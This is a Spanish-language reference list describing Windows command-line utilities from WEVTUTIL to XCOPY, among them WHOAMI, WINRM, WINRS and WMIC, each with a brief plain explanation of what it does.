WEVTUTILUtilidad de línea de comandos de eventos de Windows. Permite recuperar información acerca de registros de eventos y publicadores, instalar y desinstalar manifiestos de eventos, ejecutar consultas y exportar, archivar y borrar registros
WHEREMuestra la ubicación de archivos que coinciden con el patrón de búsqueda. De manera predeterminada, la búsqueda se realiza en el directorio actual y en las rutas especificadas por la variable de entorno PATH
WHOAMIEsta utilidad se puede usar para obtener el destino de información de grupo y nombre de usuario junto con los respectivos identificadores de seguridad (SID), privilegios, identificador de inicio de sesión (Id. de inicio de sesión) del usuario actual (testigo de acceso) en el sistema local. Es decir, quién es el usuario actualmente conectado. Si no se especifica ningún modificador, la herramienta muestra nombre de usuario en formato NTLM (dominio\nombre_usuario)
WINHLP32Ejecuta los archivos de ayuda de Windows que usan la extensión HLP
WINRMHerramienta de la línea de comandos de Administración remota de Windows Administración remota de Windows (WinRM) es la implementación de Microsoft del protocolo WS-Management, que proporciona una forma segura de comunicarse con equipos locales y remotos mediante servicios web
WINRSAbre una ventana de comandos en modo seguro con un equipo en la red
WINSATHerramienta de evaluación del sistema de Windows (WinSAT)
WMICMuestra información de WMI en el shell de comandos interactivo. Permite acceder a todo tipo de informaciones, tanto de el equipo local o a otro en la red, enumera todos los datos del hardware y del software disponibles.
XCOPYCopia archivos y árboles de directorios